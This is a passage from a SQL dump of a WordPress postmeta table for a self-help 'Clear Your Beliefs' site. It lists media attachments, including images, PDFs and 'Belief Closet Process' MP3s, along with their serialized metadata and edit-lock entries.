"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(740, 969, '_wp_attached_file', '2014/06/solar-radiation.jpg'),
(741, 969, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:627;s:6:"height";i:418;s:4:"file";s:27:"2014/06/solar-radiation.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"solar-radiation-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"solar-radiation-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:27:"solar-radiation-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:27:"solar-radiation-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:27:"solar-radiation-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:27:"solar-radiation-627x372.jpg";s:5:"width";i:627;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(742, 970, '_wp_attached_file', '2014/06/Stars-swirling-over-mountain.jpg'),
(743, 970, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:600;s:6:"height";i:400;s:4:"file";s:40:"2014/06/Stars-swirling-over-mountain.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:40:"Stars-swirling-over-mountain-600x372.jpg";s:5:"width";i:600;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(744, 971, '_wp_attached_file', '2014/06/sun-behind-tree.jpg'),
(745, 971, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:720;s:6:"height";i:558;s:4:"file";s:27:"2014/06/sun-behind-tree.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"sun-behind-tree-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"sun-behind-tree-300x232.jpg";s:5:"width";i:300;s:6:"height";i:232;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:27:"sun-behind-tree-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:27:"sun-behind-tree-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:27:"sun-behind-tree-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:27:"sun-behind-tree-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(746, 972, '_wp_attached_file', '2014/06/water-flows-around.jpg'),
(747, 972, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:900;s:6:"height";i:587;s:4:"file";s:30:"2014/06/water-flows-around.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"water-flows-around-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"water-flows-around-300x195.jpg";s:5:"width";i:300;s:6:"height";i:195;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"water-flows-around-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"water-flows-around-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"water-flows-around-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"water-flows-around-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:30:"water-flows-around-900x576.jpg";s:5:"width";i:900;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(748, 973, '_wp_attached_file', '2014/06/wave-in-full-color.jpg');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(749, 973, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:480;s:6:"height";i:320;s:4:"file";s:30:"2014/06/wave-in-full-color.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"wave-in-full-color-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"wave-in-full-color-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"wave-in-full-color-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"wave-in-full-color-400x320.jpg";s:5:"width";i:400;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"wave-in-full-color-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(750, 974, '_wp_attached_file', '2014/06/woman-swimming-under-wave.jpg'),
(751, 974, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:500;s:6:"height";i:330;s:4:"file";s:37:"2014/06/woman-swimming-under-wave.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"woman-swimming-under-wave-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"woman-swimming-under-wave-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:37:"woman-swimming-under-wave-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:37:"woman-swimming-under-wave-400x330.jpg";s:5:"width";i:400;s:6:"height";i:330;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:37:"woman-swimming-under-wave-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(752, 985, '_wp_attached_file', '2014/06/ReportsLanding.jpg'),
(753, 985, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:302;s:6:"height";i:201;s:4:"file";s:26:"2014/06/ReportsLanding.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"ReportsLanding-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"ReportsLanding-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:26:"ReportsLanding-220x201.jpg";s:5:"width";i:220;s:6:"height";i:201;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:26:"ReportsLanding-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(754, 986, '_wp_attached_file', '2014/06/report-stack_1.jpg'),
(755, 986, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:703;s:6:"height";i:476;s:4:"file";s:26:"2014/06/report-stack_1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"report-stack_1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"report-stack_1-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:26:"report-stack_1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:26:"report-stack_1-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:26:"report-stack_1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:26:"report-stack_1-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";d:3.5;s:6:"credit";s:12:"Boris Yankov";s:6:"camera";s:22:"Canon EOS 400D DIGITAL";s:7:"caption";s:0:"";s:17:"created_timestamp";i:1137973606;s:9:"copyright";s:0:"";s:12:"focal_length";s:2:"18";s:3:"iso";s:3:"100";s:13:"shutter_speed";s:3:"1.3";s:5:"title";s:28:"High pile of hardcover books";}}'),
(757, 1013, '_wp_attached_file', '2014/03/CYB-Bonus-1-CL.pdf'),
(758, 1014, '_wp_attached_file', '2014/03/CYB-Bonus-2-AJ.pdf'),
(759, 1015, '_wp_attached_file', '2014/03/CYB-7.pdf'),
(760, 1016, '_wp_attached_file', '2014/03/CYB-6.pdf'),
(761, 1017, '_wp_attached_file', '2014/03/CYB-5.pdf'),
(762, 1018, '_wp_attached_file', '2014/03/CYB-4.pdf'),
(763, 1019, '_wp_attached_file', '2014/03/CYB-3.pdf'),
(764, 1020, '_wp_attached_file', '2014/03/CYB-2.pdf'),
(765, 1021, '_wp_attached_file', '2014/03/CYB-1.pdf'),
(766, 171, '_edit_lock', '1491009293:2'),
(767, 928, '_edit_lock', '1517892804:2'),
(768, 1029, '_wp_attached_file', '2014/06/Carista-portrait-2.jpg'),
(769, 1029, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1376;s:6:"height";i:1646;s:4:"file";s:30:"2014/06/Carista-portrait-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Carista-portrait-2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"Carista-portrait-2-250x300.jpg";s:5:"width";i:250;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"Carista-portrait-2-856x1024.jpg";s:5:"width";i:856;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"Carista-portrait-2-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"Carista-portrait-2-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"Carista-portrait-2-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"Carista-portrait-2-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:31:"Carista-portrait-2-1038x576.jpg";s:5:"width";i:1038;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";d:6.2999999999999998;s:6:"credit";s:0:"";s:6:"camera";s:12:"Canon EOS 5D";s:7:"caption";s:0:"";s:17:"created_timestamp";i:1333298312;s:9:"copyright";s:0:"";s:12:"focal_length";s:3:"110";s:3:"iso";s:3:"400";s:13:"shutter_speed";s:17:"0.016666666666667";s:5:"title";s:0:"";}}'),
(770, 1053, '_wp_attached_file', '2014/06/Carista-Portrait-3.jpg'),
(771, 1053, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:381;s:6:"height";i:492;s:4:"file";s:30:"2014/06/Carista-Portrait-3.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Carista-Portrait-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"Carista-Portrait-3-232x300.jpg";s:5:"width";i:232;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"Carista-Portrait-3-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"Carista-Portrait-3-381x400.jpg";s:5:"width";i:381;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"Carista-Portrait-3-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"Carista-Portrait-3-381x372.jpg";s:5:"width";i:381;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";d:8;s:6:"credit";s:0:"";s:6:"camera";s:13:"Canon EOS 40D";s:7:"caption";s:0:"";s:17:"created_timestamp";i:1333299792;s:9:"copyright";s:0:"";s:12:"focal_length";s:2:"48";s:3:"iso";s:3:"400";s:13:"shutter_speed";s:17:"0.076923076923077";s:5:"title";s:0:"";}}'),
(793, 1106, '_wp_attached_file', '2014/06/Clear-Your-Beliefs.png'),
(794, 1106, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:863;s:6:"height";i:442;s:4:"file";s:30:"2014/06/Clear-Your-Beliefs.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-300x153.png";s:5:"width";i:300;s:6:"height";i:153;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-672x372.png";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(804, 1128, '_edit_lock', '1404505937:1'),
(805, 1128, '_edit_last', '1'),
(806, 1128, '_wp_page_template', 'default'),
(807, 1132, '_edit_lock', '1491009285:2'),
(808, 1132, '_edit_last', '2'),
(809, 1132, '_wp_page_template', 'default'),
(810, 1139, '_wp_attached_file', '2014/03/Belief-Self-Diagnosis-Exercise-2013.2.pdf'),
(811, 1141, '_edit_lock', '1525141734:2'),
(812, 1141, '_edit_last', '2'),
(813, 1141, '_wp_page_template', 'default'),
(814, 1143, '_wp_attached_file', '2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.2.pdf'),
(815, 1145, '_wp_attached_file', '2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf'),
(816, 1147, '_wp_attached_file', '2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf'),
(817, 1156, '_wp_attached_file', '2014/03/Creating_On_Purpose_SampleChapters.pdf'),
(818, 1163, '_wp_attached_file', '2014/03/The-Clear-Your-Beliefs-Guidebook.pdf'),
(850, 1288, '_wp_page_template', 'default'),
(849, 1288, '_edit_last', '2'),
(848, 1288, '_edit_lock', '1419301438:2'),
(847, 928, '_wp_page_template', 'default'),
(846, 928, '_edit_last', '135'),
(854, 1295, '_edit_lock', '1408047646:2'),
(855, 1295, '_edit_last', '2'),
(856, 1296, '_wp_attached_file', '2014/07/Hooponopono-Introduction.mp3'),
(857, 1296, '_wp_attachment_metadata', 'a:16:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:2;s:11:"sample_rate";i:44100;s:7:"bitrate";i:320000;s:11:"channelmode";s:6:"stereo";s:12:"bitrate_mode";s:3:"cbr";s:5:"codec";s:4:"LAME";s:7:"encoder";s:8:"LAME3.91";s:8:"lossless";b:0;s:15:"encoder_options";s:6:"CBR320";s:17:"compression_ratio";d:0.22675736961451248;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:6525386;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:164;s:16:"length_formatted";s:4:"2:43";}'),
(861, 1303, '_edit_lock', '1405780641:1'),
(862, 1303, '_edit_last', '1'),
(864, 1311, '_wp_attached_file', '2014/03/Coming-Soon.jpg'),
(865, 1311, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:822;s:6:"height";i:584;s:4:"file";s:23:"2014/03/Coming-Soon.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Coming-Soon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Coming-Soon-300x213.jpg";s:5:"width";i:300;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:23:"Coming-Soon-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:23:"Coming-Soon-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:23:"Coming-Soon-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:23:"Coming-Soon-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:23:"Coming-Soon-822x576.jpg";s:5:"width";i:822;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(866, 1321, '_edit_lock', '1457751295:2'),
(867, 1321, '_edit_last', '1'),
(868, 1322, '_wp_attached_file', '2014/07/CYB-AFFILIATE-OPTIONS.pdf'),
(869, 1321, '_wp_page_template', 'default'),
(870, 1296, '_edit_lock', '1408046015:2'),
(871, 1328, '_edit_lock', '1457751129:2'),
(872, 1328, '_edit_last', '2'),
(873, 1328, '_wp_page_template', 'default'),
(874, 1330, '_edit_lock', '1419031287:2'),
(875, 1330, '_edit_last', '2'),
(876, 1330, '_wp_page_template', 'default'),
(877, 1332, '_edit_lock', '1424288977:2'),
(878, 1332, '_edit_last', '2'),
(879, 1332, '_wp_page_template', 'default'),
(880, 1335, '_edit_lock', '1419222740:2'),
(881, 1335, '_edit_last', '2'),
(882, 1335, '_wp_page_template', 'default'),
(883, 1340, '_edit_last', '2'),
(884, 1340, '_wp_page_template', 'default'),
(885, 1340, '_edit_lock', '1421376835:2'),
(886, 1346, '_wp_attached_file', '2014/08/BCP_goodnews.mp3'),
(887, 1346, '_wp_attachment_metadata', 'a:21:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:96000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR96";s:17:"compression_ratio";d:0.1360544217687075;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:1995783;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:167;s:16:"length_formatted";s:4:"2:46";s:5:"title";s:12:"BCP_goodnews";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:10:"iTunes 9.2";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:4:"year";s:4:"2010";s:5:"genre";s:9:"Self-help";}'),
(888, 1347, '_wp_attached_file', '2014/08/bcp_secretrevealed.mp3'),
(889, 1347, '_wp_attachment_metadata', 'a:21:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:96000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR96";s:17:"compression_ratio";d:0.1360544217687075;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:1737255;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:145;s:16:"length_formatted";s:4:"2:25";s:5:"title";s:18:"bcp_secretrevealed";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:4:"year";s:4:"2010";s:5:"genre";s:9:"Self-help";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:10:"iTunes 9.2";}'),
(890, 1348, '_wp_attached_file', '2014/08/bcp_createfeelings.mp3'),
(891, 1348, '_wp_attachment_metadata', 'a:21:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:56000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR56";s:17:"compression_ratio";d:0.079365079365079361;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:902769;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:129;s:16:"length_formatted";s:4:"2:09";s:5:"title";s:18:"bcp_createfeelings";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:13:"part_of_a_set";s:1:"4";s:4:"year";s:4:"2010";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:13:"iTunes 10.0.1";}'),
(892, 1349, '_wp_attached_file', '2014/08/bcp_beneathsurface-_new.mp3'),
(893, 1349, '_wp_attachment_metadata', 'a:20:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:56000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR56";s:17:"compression_ratio";d:0.079365079365079361;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:1312847;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:188;s:16:"length_formatted";s:4:"3:07";s:5:"title";s:18:"bcp_beneathsurface";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:13:"iTunes 10.0.1";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:4:"year";s:4:"2010";}'),
(894, 1363, '_wp_attached_file', '2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3'),
(895, 1363, '_wp_attachment_metadata', 'a:15:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:192000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:6:"CBR192";s:17:"compression_ratio";d:0.27210884353741499;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:88734378;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:3698;s:16:"length_formatted";s:7:"1:01:37";s:4:"year";s:25:"2014-08-08T10:15:25-07:00";}'),
(896, 1369, '_wp_attached_file', '2014/08/bcp_beneathsurface-_new1.mp3'),
(897, 1369, '_wp_attachment_metadata', 'a:20:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:56000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR56";s:17:"compression_ratio";d:0.079365079365079361;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:1312847;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:188;s:16:"length_formatted";s:4:"3:07";s:5:"title";s:18:"bcp_beneathsurface";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:13:"iTunes 10.0.1";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:4:"year";s:4:"2010";}'),
(898, 1371, '_wp_attached_file', '2014/08/bcp_createfeelings1.mp3'),
